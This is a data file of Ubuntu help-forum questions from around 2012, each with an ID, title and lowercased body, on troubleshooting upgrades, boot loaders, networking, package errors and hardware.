216590	ubuntu 12.10 upgrade breaks my vm	i 'm sorry if this has been asked before . a little background : i have to use an ubuntu vm for work ( host is windows 7 x64 , running oracle vmware 4.2.4r81684 on a hp probook 4730s laptop ) , mainly for low level network control . so , i installed ubuntu 12.04 , this was a few weeks back . i set the upgrade process going a few days ago and let my vm do it 's stuff . when i came back several hours later , the upgrade process had crashed - i ca n't remember the error message exactly , but it was something along the lines of one of the quantal software servers being unreachable . i was prompted to reboot and did ... foolishly . once the vm had rebooted , i logged on and was presented with the quantal wallpaper only . i noticed that my mouse movements were n't being mapped correctly and that some keystrokes were n't being accepted first time . several minutes later , i was prompted about a problem having occurred and was asked if i 'd like to send a bug report . the application unity greeter has closed unexpectedly . executable path : /usr/bin/unity-greeter i hit ctrl+alt and t and issued the following commands dconf reset -f /org/compiz/ setsid unity in the log that was spat out , i noticed something along the lines of opengl illegal instruction* i needed to boot into this vm ( i figured it 'd be quicker to fix this , than re-install ubuntu 12.04 and all the applications that i use ) , so i attempted to install xfce4 . when i issued the command sudo apt-get install xfce4 i was told that there where pending installs and that i should run the command sudo apt-get -f install before installing anything . i ran that command and noticed that there where a bunch of linux image headers 3.x installing . i rebooted to see if this fixed the problem - no dice . so , i pulled up another terminal ( with crtl+alt+t after logging in ) and installed xfec4 , then logged out . when i logged into the xfce 4 desktop environment , i was presented with the same message about the unity greeter having closed unexpectedly , but was able to use the vm . i know that i 'm being pretty vague here , and i apologise for that . is there a way to `` fix '' ubuntu 12.10 on my vm , or to rollback to 12.04 ? note : i 'd have pasted the entire log , but i 'm having trouble bringing another terminal up after logging on .
216592	get more information about the crash	when i issue the command last in my terminal i see the following entries i.e . `` crash '' : i meant the command last `` show listing of last logged in users '' . root @ lab18 : ~ # last tito pts/3 x.x.x.x tue nov 13 16:22 still logged in tito pts/3 x.x.x.x tue nov 13 09:13 - 16:22 ( 07:09 ) reboot system boot 3.2.0-32-generic mon nov 12 23:58 - 16:22 ( 16:24 ) tito pts/1 192.168.26.5 mon nov 12 23:56 - crash ( 00:01 ) tito pts/4 192.168.26.5 mon nov 12 22:46 - crash ( 01:12 ) uname -a linux homeserver 3.2.0-32-generic-pae # 51-ubuntu smp wed sep 26 21:54:23 utc 2012 i686 i686 i386 gnu/linux last reboot reboot system boot 3.2.0-32-generic mon nov 12 23:58 - 16:29 ( 16:31 ) wtmp begins thu nov 1 10:17:16 2012 i have found some information about the crash in the syslog and the kernel.log however i was curious if various linux distributions ( ubuntu ) is writing some other files other than the syslog or kernel.log where specific information about the crash can be decoded . and what i mean is for example many networking vendors do i.e . cisco , hp , juniper , enterasys do have syslog , current.log files , snmp informs/traps messages , that are saved to some sort of place locally on the file system or remotely in case an even occur , however they also have specifically designed files such as systemdumps where a backtrace from the callstack can be found and analyzed in case a crash occur and occasionally this could help to debug the problem . so the question is does ubuntu has also such kind of place where information is being stored about the crash . regards , konstantin
216594	investigate disk writes further to find out which process writes to my ssd	i try to minimize disk writes to my new ssd system drive . i 'm stuck with iostat output : ~ > iostat -d 10 /dev/sdb linux 2.6.32-44-generic ( pluto ) 13.11.2012 _i686_ ( 2 cpu ) device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 8,60 212,67 119,45 21010156 11800488 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 3,00 0,00 40,00 0 400 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 1,70 0,00 18,40 0 184 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 1,20 0,00 28,80 0 288 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 2,20 0,00 32,80 0 328 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 1,20 0,00 23,20 0 232 device : tps blk_read/s blk_wrtn/s blk_read blk_wrtn sdb 3,40 19,20 42,40 192 424 as i see there are writes to sdb . how can i resolve which process writes ? i know about iotop , but it does n't show which filesystem is being accessed .
216598	( x ) ubuntu 12.10 and lenovo r60	i am about to buy older notebook lenovo r60 with intel core duo 2x 1.8ghz , 2048mb ddr2 , 80gb sata hdd and intel gma graphic card . will the ubuntu or xubuntu 12.10 be compatible with this configuration out of the box ? thank you , jan
216604	valve 's steam on ubuntu 12.04 x64	i 've tried installing steam from valve 's website , although i had a persistent error when trying to start steam : installing breakpad exception handler for appid ( steam ) /version ( 1352224866_client ) i 've so far tried the another askubuntu.com solved question with installing ia32-libs , although this did n't work . i 'm pretty not sure what to do next to fix this problem .
216608	wan access problem	i was desperately trying to set up my system as an externally accessible machine in the past 4 days without luck . must say , it was a great journey so far , learned a lot about linux networking in details , but i have an issue with reaching my machine from the internet . i try to detail everything for better understanding . system landscape : two old thinkpad-t60 laptop , two 3g usb wifi dongle ( service provider : three.co.uk ) , os : ubuntu quantal 12.10 no router , modem , or any other device i try to achieve the following : setting up a laptop as an externally reachable web-server running apache2 , listening on port 80 as usual . the host machine connected to the internet through a 3g dongle . no other device on it 's way , external router etc.. i 've done the following so far started off with a clean ubuntu install just to make sure . installed apache2 and php5 . installed noip2 module . summary apache2 is up and running just fine . i can load the default unformatted site from the browser referencing to localhost . i 've registered at no-ip.com basic account ( dynamic dns service ) and installed it 's software which keep their server up to date with my dynamic ip . tested and double checked , its working perfect . i am pretty sure about , i have to 'play ' with the iptables so i was going through many tutorials and documentations to have better understanding . since the machine is not reachable from the outside network still , i assuming that i do not do something quite right . some necessary outputs $ ifconfig eth0 link encap : ethernet hwaddr 00:1a:6b:35 : c0:92 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 memory : ee000000-ee020000 eth1 link encap : ethernet hwaddr 58:2c:80:13:92:63 inet addr:192.168.1.100 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :5a2c:80ff : fe13:9263/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:119918 errors:0 dropped:0 overruns:0 frame:0 tx packets:103007 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:110091536 ( 110.0 mb ) tx bytes:13204658 ( 13.2 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:27915 errors:0 dropped:0 overruns:0 frame:0 tx packets:27915 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:2253626 ( 2.2 mb ) tx bytes:2253626 ( 2.2 mb ) wlan0 link encap : ethernet hwaddr 00:1b:77:03 : f0:97 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) iptables -l chain input ( policy accept ) target prot opt source destination accept tcp -- anywhere anywhere tcp dpt : http state new , established accept tcp -- anywhere anywhere tcp dpt : http-alt state new , established accept tcp -- anywhere anywhere tcp dpt:8888 state new , established chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination ip tables config from a bash script i wrote executed as -- > ./basicfw.sh eth1 # ! /bin/bash # delete everything iptables -f iptables -x iptables -t nat -f iptables -t nat -x iptables -t mangle -f iptables -t mangle -x iptables -z iptables -f input iptables -p input accept iptables -f output iptables -p output accept iptables -f forward iptables -p forward accept iptables -a input -i $ 1 -p tcp -m tcp -- dport 80 -m state -- state new , established -j accept iptables -a input -i $ 1 -p tcp -m tcp -- dport 8080 -m state -- state new , established -j accept iptables -a input -i $ 1 -p tcp -m tcp -- dport 8888 -m state -- state new , established -j accept netstat -anl | grep listen tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen tcp 0 0 0.0.0.0:8888 0.0.0.0 : * listen tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen tcp6 0 0 : :1:631 : : : * listen tcp6 0 0 : ::8888 : : : * listen nmap ***.no-ip.org starting nmap 6.01 ( http : //nmap.org ) at 2012-11-13 10:57 central europe standard time nmap scan report for 92.41.31.247.threembb.co.uk ( 92.41.31.247 ) host is up ( 0.11s latency ) . not shown : 99 filtered ports port state service 113/tcp closed ident nmap done : 1 ip address ( 1 host up ) scanned in 3.70 seconds as you can see the setup is pretty lame , i 've just got into this whole subject . i assume that i do not have to forward eth1 to any other inerface because i think it is the one where traffic entering on the given address . i would like to hear any mature opinion about the possible work around to establish a wan connection with this machine . isp may blocking port 80 so i tried to change the setup to 8080 and forwarded from no-ip.com dns service.. opened 8080 on iptables , reconfigured apache2 properly and its still unreachable . i do not want to use this solution to any real life use-case , just try to make it work . it 's a nice learning curve . thanks in advance , pete**
216609	how can i remove the items form grub boot list	this my grub boot loader and it show that i have two os and i want other lines to remove it specially under line because it make anyone can edit it and make trouble for boot systems so how can remove it or change ?
216617	change login screen to gnome-shell login	i was just goofing around in a vm to test what would happen if i purgen unity : sudo apt-get remove -- purge unity* i found that i get an startup error , but when i proceed , i got this awesome login screen : it has an sexy effect and is just the gnome style my whole pc has got . so can any one please tell me how i change the default login screen program without having to bother clicking `` fix this error '' on every boot ? thanks in advance . [ edit ] : i have been able to change it ( my own answer ) , but now i see the old purple background for a second when i logged in , and that background is only used in the old greeter screen . how do i change it ( or where are those backgrounds located ) ?
216621	how to add user to separate filesystem ( armel )	i 'm trying to work out how to add a user to a separate filesystem , as described here , specifically point 5 : add a local user and password for the user , then add the user to the adm and sudo groups . i 've read around chroot , but i do n't believe this will work as the default command to run is /bin/bash , which would require the target fs to be binary compatible . in this case , the target filesystem is armel so it 's not compatible .
216624	user account disabled after upgrade to 12.04.1 lts	i upgraded from 10.xxx to 12.04.1 lts using the upgrade feature within ubuntu . system upgraded but after a reboot , the graphical interface comes up . when i try logging in using a user account that pre-existed on the system , the graphical interface screen disappears , screen goes blank and then reverts to the graphical interface prompting for a password . i have loads of data and installed programs under the particular user account . please help ... .
216627	problems dualbooting ubuntu because of uefi	i have an x-series asus laptop which i just bough about a month ago . i want to dualboot ubuntu - windows . i can easily access liveusb with both uefi enabled and disabled . i heard that there were problems with uefi , so i disabled it . after i 've installed the system i could n't access it . it just boots to windows straight . another unusual thing , that never happened to me before was that the partition editor wanted me to create a bios reserved area , which i did , but not at the beginning of the table . any ideas how to access the ubuntu partition ? as far as i can guess both windows and ubuntu have to be both of the same type of boot , either legacy or efi . this is not the case of what i have now . so , if i reinstall ubuntu in uefi mode that correlates with my windows type , will i then be able to boot into it ? i have a constraint , my laptop does n't have a cd rom , so i can not reinstall windows , nor can i move around the windows recovery partition . this is the boot-repair report : http : //paste.ubuntu.com/1354254/ solution i 've enabled uefi in bios , and reinstalled ubuntu with uefi enabled . it works fine now , although if i select windows from the grub menu , it does n't work . but i can live with that , since i can just select windows boot from the bios instead .
216632	lsi sas 9240-8i on ubuntu 12.04 hangs on modprobe	i used the lsi 9240-8i card on a smaller intel motherboard with no problems in ubuntu , with zfs . however , we rebuilt the server to allow for more disks , using the asrock x79 extreme 11 motherboard . it has 7 pcie slots , and a lsi 2008 on-board . at first i thought the lsi 9240 , when plugged in to pcie , clashed with the on-board lsi 2008 . every time i plugged in the lsi 9240 , modprobe would hang . then i completely disabled the on-board lsi 2008 , and the problem persisted . last night it booted perfectly once - all lsi cards and connected disks visible ... however , all subsequent reboots failed . both lsi cards ' bios scans appear and they both see the disks connected to them , but ubuntu modprobe hangs . some selected dmesg lines , with both lsi cards enabled : [ 190.752100 ] megasas : [ 0 ] waiting for 1 commands to complete [ 195.772071 ] megasas : [ 5 ] waiting for 1 commands to complete [ 200.792079 ] megasas : [ 10 ] waiting for 1 commands to complete [ 205.812078 ] megasas : [ 15 ] waiting for 1 commands to complete [ 210.832037 ] megasas : [ 20 ] waiting for 1 commands to complete [ 215.852077 ] megasas : [ 25 ] waiting for 1 commands to complete [ 220.872072 ] megasas : [ 30 ] waiting for 1 commands to complete [ 225.892078 ] megasas : [ 35 ] waiting for 1 commands to complete [ 230.912086 ] megasas : [ 40 ] waiting for 1 commands to complete [ 235.932075 ] megasas : [ 45 ] waiting for 1 commands to complete [ 240.306157 ] usb 2-1.5 : usb disconnect , device number 7 [ 240.952076 ] megasas : [ 50 ] waiting for 1 commands to complete [ 240.960034 ] info : task modprobe:233 blocked for more than 120 seconds . [ 240.960055 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message . [ 240.960067 ] modprobe d ffffffff81806200 0 233 146 0x00000004 [ 240.960075 ] ffff880806ae3b48 0000000000000086 ffff880806ae3ae8 ffffffff8101adf3 [ 240.960083 ] ffff880806ae3fd8 ffff880806ae3fd8 ffff880806ae3fd8 0000000000013780 [ 240.960090 ] ffffffff81c0d020 ffff880806acae00 ffff880806ae3b58 ffff880808961720 [ 240.960096 ] call trace : [ 240.960107 ] [ < ffffffff8101adf3 > ] ? native_sched_clock+0x13/0x80 [ 240.960116 ] [ < ffffffff816579cf > ] schedule+0x3f/0x60 [ 240.960137 ] [ < ffffffffa00093f5 > ] megasas_issue_blocked_cmd+0x75/0xb0 [ megaraid_sas ] [ 240.960144 ] [ < ffffffff8108aa50 > ] ? add_wait_queue+0x60/0x60 [ 240.960154 ] [ < ffffffffa000a6c9 > ] megasas_get_seq_num+0xd9/0x260 [ megaraid_sas ] [ 240.960164 ] [ < ffffffffa000ab31 > ] megasas_start_aen+0x31/0x60 [ megaraid_sas ] [ 240.960174 ] [ < ffffffffa00136f1 > ] megasas_probe_one+0x69a/0x81c [ megaraid_sas ] [ 240.960182 ] [ < ffffffff813345bc > ] local_pci_probe+0x5c/0xd0 [ 240.960189 ] [ < ffffffff81335e89 > ] __pci_device_probe+0xf9/0x100 [ 240.960197 ] [ < ffffffff8130ce6a > ] ? kobject_get+0x1a/0x30 [ 240.960205 ] [ < ffffffff81335eca > ] pci_device_probe+0x3a/0x60 [ 240.960212 ] [ < ffffffff813f5278 > ] really_probe+0x68/0x190 [ 240.960217 ] [ < ffffffff813f5505 > ] driver_probe_device+0x45/0x70 [ 240.960223 ] [ < ffffffff813f55db > ] __driver_attach+0xab/0xb0 [ 240.960227 ] [ < ffffffff813f5530 > ] ? driver_probe_device+0x70/0x70 [ 240.960233 ] [ < ffffffff813f5530 > ] ? driver_probe_device+0x70/0x70 [ 240.960237 ] [ < ffffffff813f436c > ] bus_for_each_dev+0x5c/0x90 [ 240.960243 ] [ < ffffffff813f503e > ] driver_attach+0x1e/0x20 [ 240.960248 ] [ < ffffffff813f4c90 > ] bus_add_driver+0x1a0/0x270 [ 240.960255 ] [ < ffffffffa001e000 > ] ? 0xffffffffa001dfff [ 240.960260 ] [ < ffffffff813f5b46 > ] driver_register+0x76/0x140 [ 240.960266 ] [ < ffffffffa001e000 > ] ? 0xffffffffa001dfff [ 240.960271 ] [ < ffffffff81335b66 > ] __pci_register_driver+0x56/0xd0 [ 240.960277 ] [ < ffffffffa001e000 > ] ? 0xffffffffa001dfff [ 240.960286 ] [ < ffffffffa001e09e > ] megasas_init+0x9e/0x1000 [ megaraid_sas ] [ 240.960294 ] [ < ffffffff81002040 > ] do_one_initcall+0x40/0x180 [ 240.960301 ] [ < ffffffff810a82fe > ] sys_init_module+0xbe/0x230 [ 240.960307 ] [ < ffffffff81661ec2 > ] system_call_fastpath+0x16/0x1b [ 240.960314 ] info : task scsi_scan_7:349 blocked for more than 120 seconds .
216641	dpkg -- set-selections from 11.10 on 12.04lts	i have to move a server to a different dc in a different country . the server is currently running 11.10 , but the new fresh installed os will be 12.04 . the hardware of both is completely different . in order to install the same packages that the server currently uses , i am thinking of exporting all packages to a list and then run this list on the new machine . i will after that proceed with transferring the configuration files for the lamp stack . my question is if this will work , or if there will be a problem because of the differences in the versions of the os ? what is the correct way to do it ? ps . i have no access to kvm to reload the os as an image , so this would not be an option .
216644	i can not delete files from root 's trash	i deleted some large files from nautilus launched as sudo . they still show in /home/.trash-0/files/ < foldername > when i type sudo sh -c `` du -h /home | grep -p ' [ 0-9 ] g\t ' '' but when i type sudo rm /home/.trash-0/files/* i get the message : rm : can not remove `/home/.trash-0/files/* ' : no such file or directory i was able to delete individual files with their exact file names in place of * , but when i used * , it gave the error message as above . i do not want to have to delete them all individually if i can help it .
216645	how can i install applications , share files on a remote computer ?	my friend and i are both using ubuntu 12.04 , however we live in different places . we want to access each other 's computer through internet . how can we do that ? for example , if i want to install a program to my friend 's computer-by using my computer , is it possible ?
216647	how do i get ubuntu terminal prompt in windows 7 with vmware player	i installed vmware player on my windows 7 pc . now i downloaded ubuntu ( ubuntu-12.10-desktop-i386.iso ) software from http : //www.ubuntu.com/download/desktop . i installed ubuntu via the instruction at http : //www.howtogeek.com/howto/11287/how-to-run-ubuntu-in-windows-7-with-vmware-player/ . it is version ubuntu 12.10 . now i have the ubuntu installed and it shows up in the left corner when i double-click on vmware player icon . how do i get the unix like prompt in ubuntu here ? i tried all icons but i find no ways . the documentation in the above link shows there are `` applications '' - > '' accessories '' - > '' terminal '' menus that takes it to the unix like terminal . but i do not see such options . i anticipated something was wrong and i reinstalled ubuntu and that gives the 2nd ubuntu ( 2 ) icon in the vmware screen . when i double-click `` ubuntu '' or `` ubuntu ( 2 ) '' , i get the other screen ( e2.jpg ) . could you let me know how i get to the terminal ? thanks a lot .
216653	how to turn off monitor by hotkeys ?	i am using xfce desktop in ubuntu 12.04 and added the shortcut keys in order to turn off my monitor . the command `` xset dpms force off '' works fine in terminal . but when it added in the keyboard shortcuts , the monitor turns off a second then turns on immediately . so how cann i turn off the monitor by hotkeys ? thanks .
216654	e : unable to locate package slave-gtk3	i tried to install slave gtk3 theme and this is the error msg i am getting . i used the command sudo apt-get install slave-gtk3 for the installation please someone help in this topic
216659	wubi , windows 8 , truecrypt , uefi , and a big headache	so , i have a fresh install of windows 8 ... here 's the issue . when i first installed w8 , the wubi loader would launch just fine , no issues , no fuss ... at the time , i elected to avoid installing through wubi , and just setting up a dedicated partition , and i think this is where i messed up . i installed my drivers ( no oem bloatware* ) , ran truecrypt , set up a dedicated partition.. everything appeared to be fine , was still able to run my tc bootloader , i could n't [ esc ] to grub yet though , i thought to myself `` okay , it 's just because i have n't encrypted the system yet , but rather only installed the bootloader '' . after 8 hours of encrypting , i woke up and thought `` awesome , let me reboot & check ubuntu '' , which , to my dismay , did not properly install . soooo ... i booted my 12.10 livecd to try another installation , and that 's when all hell broke loose . ubuntu refused to identify any partitions within the installer . gparted threw an error about my hdd when i launched it , showed me 3 partitions , 2 of which were `` unknown '' thanks to truecrypt , and the one where i attempted to install ubuntu . the ubuntu partition was labeled `` extended '' . being too scared to screw around with the partitions , or make any changes to the table , i booted into windows 8 ( yes ! still worked ! ) , attempted to run wubi , and i got the dreaded error where it refuses to run . i checked my environment variables , no python path.. okay ... so i checked my startup folder.. still there ... check the temp folder for a wubi log file.. nope ! basically , i have several issues , and each one is only compounded by the next . any help with this situation can make my day vastly better . system specs : thinkpad edge e535 , amd apu a4-4300m , 4gb ram , windows 8 , uefi ( the devil ! ! ! ) and , well , that 's about it . *oem bloatware : i do n't ever install oem software , and seeing as it 's a thinkpad , i related it to they python issue , but that 's not the case . **side note : i did a side-by-side installation with win8 from the ubuntu installer after i installed the truecrypt bootloader , and before i encrypted my drive . ***edit : i have secure boot disabled with uefi , and i have it set to uefi+legacy booting mode . **edit2 : i do n't care about encrypting ubuntu , i only want my windows partition encrypted . my priority is dual-boot .
216660	no root account	okay , here 's my problem . i was being an idiot and installed compiz-core on my xubuntu 12.10 . so there i was , trying to figure out how to fix my issue , and i did sudo xfwm4 -- replace . then i was unable to login . so i logging with guest , delete my old account , without deleting the home folder , of course , and i create a new account `` michael2 '' . instead of creating a new home folder for it , i instead instructed the program to use my old home folder . unfortunately , it completely erased the folder , along with over 150gb worth of downloads and about 200 hours worth of work ( i work from home , so , yeah ) . and to top it all off , whenever i try to use the sudo command , i get the error michael2 is not in the sudoers file . this incident will be reported . i do n't know how to fix this , nor can i login to root ( i never set the root password , because i never had the need to login as root to do anything ) . any help will be appreciated . is there maybe a way that i can do system restore to restore my previous files and username ? i need answers as soon as possible , because i 'm literally losing money by the second ( the entire work from home kinda thing ) .
216663	grub-probe : error : can not find a grub drive for /dev/sda1	i 'm trying to add windows 7 for my new 12.10 grub bootloader . none of the things worked out ; such as .. copying bootx64.efi methods , i 'm getting this output : grub-probe -- target=fs_uuid /boot/efi/efi/microsoft/boot/bootmgfw.efi grub-probe : error : can not find a grub drive for /dev/sda1 . check your device.map . ... ... . my device map ... ... . ( hd0 ) /dev/disk/by-id/ata-wdc_wd6400bpvt-55hxzt3_wd-wxd1ea1msvr4 ... ... . 40_custom ... .. menuentry `` microsoft windows x86_64 uefi-gpt '' { insmod part_gpt insmod fat insmod search_fs_uuid insmod chain search -- fs-uuid -- no-floppy -- set=root 80bd-e086 chainloader ( $ { root } ) /efi/microsoft/boot/bootmgfw.efi } when booting to windows 7 give me blank black screen with a cursor blinks for 2 seconds then reboot , i 've tried boot-repair too . i think i 'm missing windows uefi bootloader files .
216666	how to make a portable server for ubuntu ?	i want my server to be portable so it will be available everywhere when i plug it in to other ubuntu computers . like i want to use it at school , i will just have to run a script and the server runs . or on my friend 's computer . i wonder if this is possible , making servers portable , without re-installing on every other computers . i know that this is possible for windows . if you need more information , comment below . portable server , includes , portable `` php `` , `` mysql '' , `` phpmyadmin '' , `` apache2 '' . like the distribution of lampp , but i want that portable . is it possible to make lighttpd server portable too ?
216667	is there a version of the chromium browser that will run on ubuntu 8.04 ( hardy )	looking for a version of the chromium-browser that will run on ubuntu 8.04 ( hardy ) . there must be one since i 'm using google chrome 12.0.742.60 beta on that machine now but i 've been unable to locate any . the ppa.launchpad.net directories for hardy are empty . i do n't think i want to fight with library compatibilities trying to compile from source given how out-of-date it would be . any ideas ?
216668	problems connecting to wireless network when installing lubuntu	i would like to install lubuntu on my lg netbook . i previously ran ubuntu 10.04 and yesterday installed ubuntu 12.10 but found it too slow . during the install i get the screen that shows i am not connected to the internet . behind it i see a notification that i am not connected to the internet . my question is can i use the terminal emulator to manually connect to my wireless internet or is there a way to show my network connections and choose the one to connect to ( this is what the 12.10 install did and it worked for me ) ? thanks .
216669	how to interpret the contents of ~/.gconf ?	consider a key like /apps/metacity/global_keybindings/cycle_windows i can access this this key using gconf-editor . however when i cd to ~/.gconf/apps/metacity i find an empty file named % gconf.xml and a directory called general which contanains another % conf.xml file which is like this : < gconf > < entry name= '' num_workspaces '' mtime= '' an integer here '' type= '' int '' value= '' 4 '' / > < /gconf > my questions are , if the keys are stored somewhere else other than .gconf what is the purpose of this directory and how can i interpret the contents of it ? the other question is , where are these keys stored and how can i access them ? p.s . i 'm running 12.04 on virtual machine .
216671	unable to launch gedit with sudo	while trying to follow these instructions , i encountered the following error while attempting what seems like a simple sudo edit operation : $ sudo gedit /var/lib/dpkg/status ** ( gedit:14898 ) : warning ** : command line `dbus-launch -- autolaunch=0bd873023a78bdb34ca1b9650000000b -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n can not open display : run 'gedit -- help ' to see a full list of available command line options . running the same without sudo correctly launches gedit , but of course without editing ability . does anyone have any idea what is going on ?
216679	`` incompatible sample format 's16 ' for codec 'pcm_s24le ' , auto-selecting format 's32 ' '' error in audio conversion using avconv	i use the command avconv -y -i input_file -acodec pcm_s24le -r 24 -ar 48000 output_file to extract audio from videos . with ubuntu 10.04 the command run succesfully , but with ubuntu 12.04 i receive the error incompatible sample format 's16 ' for codec 'pcm_s24le ' , auto-selecting format 's32' how can i solve ?
216681	changing device assigned to the modem in network manager	i have an evdo modem . i tried to connect it with wvdial ; pppd works fine , but i do n't like having to use the terminal . i want to connect using network manager . the modem is detected fine in ubuntu , but it always fails . i looked syslog in /var/log and i found this : nov 13 20:54:52 alvin-ao722 networkmanager [ 18276 ] : < warn > cdma connection failed : ( 32 ) unknown error nov 13 20:54:52 alvin-ao722 networkmanager [ 18276 ] : < info > ** ( ttyusb1 ) ** : device state change : prepare - > failed ( reason 'none ' ) [ 40 120 0 ] nov 13 20:54:52 alvin-ao722 networkmanager [ 18276 ] : < info > marking connection 'smart connection 1 ' invalid . nov 13 20:54:52 alvin-ao722 networkmanager [ 18276 ] : < warn > activation ( ttyusb1 ) failed . nov 13 20:54:52 alvin-ao722 networkmanager [ 18276 ] : < info > ( ttyusb1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] nov 13 20:54:52 alvin-ao722 networkmanager [ 18276 ] : < info > ( ttyusb1 ) : deactivating device ( reason 'none ' ) [ 0 ] my modem must use ttyusb0 according to the modem manual . how can i change it ?
216682	how to install picasa picture viewer on 12.04	i need to install google picasa picture viewer on ubuntu 12.04 but there is no such package for ubuntu or any other linux distro .
216690	xcalib does n't take effect until after i suspend	i 'm running xcalib to fix my colour profile in ubuntu 12.10 xfce running on a macbook pro 13 '' . when i run xcalib nothing happens . if i then suspend and wake the laptop then the colour profile is loaded properly and my colours are fixed . what might be stopping xcalib from taking effect right away ? is there a command i can run that would force a refresh of the profile like suspending the machine seems to do ? thanks
216692	where is the user crontab stored ?	since upgrading my user 's crontab has been wiped out . this is not the first time this has happened this year and it 's a pain restoring it each time . i 'd like to be able to back up the crontab for my user but for that i need to know where it 's stored . over to you .
216697	some packages failed to repair after reinstalling 12.10	i reinstalled ubuntu 12.10 . it was not clean reinstall , since i wanted to save my personal files . however , since then , apport message keeps popping out about packages that failed to install , and can not be installed for some reason . i tried to look on other forums , but did not find any answers to this problem . just today i realized , i can not even install some programs ( such as vlc , .. ) from software center . how can i get rid of them and reinstall them , so the system works fine again ? it is saying that it will be installed , but nothing happens vlc : depends : vlc-nox ( = 2.0.4-0ubuntu1 ) ale 2.0.4-0ubuntu1 se bude instalovat depends : libavcodec-extra-53 ( > = 6:0.8.3 ) ale 6:0.8.3.6ubuntu1 se bude instalovat depends : libavutil-extra-51 ( > = 6:0.8.3 ) ale 6:0.8.3.6ubuntu1 se bude instalovat depends : libc6 ( > = 2.15 ) ale 2.15-0ubuntu20 se bude instalovat depends : libfreetype6 ( > = 2.2.1 ) ale 2.4.10-0ubuntu1 se bude instalovat depends : libgcc1 ( > = 1:4.1.1 ) ale 1:4.7.2-2ubuntu1 se bude instalovat depends : libqtcore4 ( > = 4:4.8.0 ) ale 4:4.8.3+dfsg-0ubuntu3 se bude instalovat depends : libqtgui4 ( > = 4:4.7.0~beta1 ) ale 4:4.8.3+dfsg-0ubuntu3 se bude instalovat depends : libstdc++6 ( > = 4.6 ) ale 4.7.2-2ubuntu1 se bude instalovat depends : libva-x11-1 ( > 1.0.15~ ) ale nebude se instalovat depends : libxcb-composite0 ale nebude se instalovat depends : libxcb-randr0 ( > = 1.1 ) ale nebude se instalovat depends : libxcb-xv0 ( > = 1.2 ) ale nebude se instalovat depends : zlib1g ( > = 1:1.2.3.3 ) ale 1:1.2.7.dfsg-13 does anybody knows solution to this ? thank you
216698	no admin password set	i booted ubuntu 12.10 32bit from pendive . i would like to re-partition my hard drive using gparted , but it requires root privilege* that i could not provide , because there is no password set . ( * ) root privileges are required for running gparted . what can i do ?
216699	how to get sound through hdmi with amd apu and on-board hdmi	i have just built a nas/htpc with the following components : motherboard : asus f2a85-m le a85x s-fm2 m-atx cpu : amd a-series x2 a4-5300 3.4ghz socket fm2 and now im having problems getting the audio to play through the hdmi cable . i have not installed any proprietary drivers since everything seemed to work right away . im using xubuntu because i 'm having problems finding anything with unity . the system seems to recognize the hdmi audio and i can select it in the audio settings . i see the green bar moving when im playing sound but no sound seems to reach my tv . here are some screenshots of the settings and a pastebin from the aplay -l command : https : //dl.dropbox.com/u/699329/sound2.png to sound5.png ( there are pictures up to sound5.png but i cant post that many hyperlinks http : //pastebin.com/z2wqcyab i also found a setting in bios where you could chose spdif or hdmi for digital audio and i have chosen hdmi . i have tried choosing different settings in the audio control panel but while none seem to actually crash or stop it doesnt seem as if they output audio either . i would much appreciate any help i can get since this is the last piece left untill i can use the machine properly .
216701	how to solve the error message `` the file could not be parsed or opened ? ''	when i try to do updates or download new software ( like c++ ) it gives me this error : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_binary-amd64_packages e : the package lists or status file could not be parsed or opened . i am new to ubuntu/linux and have no idea what to do . i saw a question that was similar to this , but there were some differences in the error message in the second line .
216706	installing wifi driver from .tar.gz	my laptop does not have the right wifi driver so i can not use the internet on it . i have gotten the correct driver in the .tar.gz format on another computer and transferred it to the linux laptop , but now i have no idea how to use it . people always say to use the make program but i do not have that installed ; i have only the bare minimum . how do i install a file from a ( makefile ) .tar.gz without internet access ?
216709	how to list installed packages in apt that are not backed by a repository ?	i suppose you could build a list of all packages that would be installed if you started with an empty apt database and installed everything that deborphan -a currently tells you . then compare that with what 's currently installed . the difference would be packages that can not be retrieved automatically with the current list of repositories . i 've no idea where to start with that though .
216716	swap area provided during installation then converted it to ntfs , any problem ?	in my pc there is two os , windows7 and ubuntu . i installed ubuntu after the installation of windows 7 . during installation i provided one windows partition as swap area . after the completion of installation i changed the swap area in to ntfs using windows . now i use ubuntu without swap area . any problem ... ...
